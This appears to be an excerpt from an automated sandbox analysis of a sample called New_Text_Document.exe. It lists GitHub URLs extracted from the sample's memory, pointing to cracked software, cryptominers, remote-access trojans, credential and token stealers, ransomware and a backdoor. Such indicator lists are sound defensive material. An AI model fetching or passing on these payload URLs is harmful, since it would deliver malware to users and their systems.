                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MegaCrack1496/NewCrack/blob/main/Adobe%20After%20Effects%202023%20v23.0.0.59.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MegaCrack1496/NewCrack/blob/main/Adobe%20Premiere%20Pro%202023%20v23.0.0.63%20Rus
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MegaCrack1496/NewCrack/blob/main/FL%20Studio%20Producer%20Edition%2020.7.2%20Buil
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MegaCrack1496/NewCrack/blob/main/Pass_2022_installer.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Onursanal/evlilik/raw/main/Kimlik%20fotokopileri.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Quqies/A4soft/raw/main/bin.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rebecavil77/DekstopApp/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHashhh/WinRing/raw/main/WinRing0x64.sys
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHashhh/lolminer/raw/main/lolMiner.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHashhh/watchdog/raw/main/WatchDog.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/S1lentHashhh/xmrig/raw/main/xmrig.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/SuperCrack10239/Crack/blob/main/Addobe%20Photoshop%20CRACK%202022.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/SuperCrack10239/Crack/blob/main/Adobe%20After%20Effects%202023%20v23.0.0.59.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/SuperCrack10239/Crack/blob/main/Adobe%20Premiere%20Pro%202023%20v23.0.0.63%20Rus.
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/SuperCrack10239/Crack/blob/main/FL%20Studio%20Producer%20Edition%2020.7.2%20Build
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/SuperCrack10239/Crack/blob/main/Pass_2022_installer.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/SuperCrack10239/Crack/blob/main/Wondershare%20Filmora%20CRACK.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TeamCcracks/Cracked/raw/main/Cracked.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/bual3/Best/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/clever88-code/test/raw/main/v4install.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/crack2012/FuulCrack/raw/main/Pass2022%20installer.7z.001
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/daanujs/daanujs/blob/main/Rasomware2.0.exe?raw=true
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dysan4ik1/tse/raw/main/brg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/evavevav/FortniteNewHack/raw/main/Fortnite%20New%20Hack.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/hoter666/8888/blob/main/Banana.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/hoter666/8888/blob/main/Bitter.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/hoter666/8888/blob/main/Project7.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/janchuk/VoidRAT/raw/master/VoidRAT.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/jessica360k/LitPay/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/macigaiga/cstest/raw/master/cs_maltest.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/moom825/Discord-RAT-2.0/raw/master/Discord%20rat/Resources/PasswordStealer.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/moom825/Discord-RAT-2.0/raw/master/Discord%20rat/Resources/Token%20grabber.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mr-r3b00t/RDP_Backdoor/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/neardream2/1/raw/main/1230.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/obaasia/svhost/raw/main/cbchr.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ollll4533/alexproduct/raw/main/%40Natsu338_alice.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/perecrestock/joker1488/raw/main/easy.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/puralain3478/Main/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/salatikochen/salatapps/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03-b03/02690278f8242674740078dd4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03-b03/0bd6f7619002c129af1c0230a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03-b03/161655d05f38148b9f01c784f
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03-b03/3e2d82c9de2dd414e21d69262
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03-b03/3e7ce7699a593f1d639a4aa2c
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03-b03/400f2900013a13fd86c6ed19b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/0aeb3870737fa3045af03fc548c97
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/0cb4087b8d532e5fae9ff5d39815f
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/190ab3322d6ed47185da263e1755a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/20b4ea1f84a5e558f9665e34dde6f
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/2105e00a54f1b79f80f312b0b5833
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/24cd4865f03fcaa7b5e76245734a4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/341a04c9291e3c8abdf73234d0720
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/41bbbd67f80e8b695a6dd7b7dee9e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/42a1f35d0964a5ddadc8b7bcfdc99
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/57057862192b71d7a2c5d1ef78dd5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/624c2a77dcb7007979cf123da4649
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/6f15ceecaa485f10fb8d58ce57143
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/7281624072d7fa3ba1991c4312684
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/79dbd3cf2e2673d4a3d3815f75e1b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/a108cb7fb55413596c27e5c26ab75
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/b9cfe2558142967652a7a3946a86e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/c286702ff65538ccba76472df1e9b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/d202c27ed2da0f1864f0ec0d760a0
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/f20c3e85e4cf868c660baa39734d1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/compressed-zip-t03/fdab1c4dba388ea6ea066395b3226
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/029375780db860b29c8
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/07c0acc9cd9a6ae4af6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/12cc22da6901d5fc26e
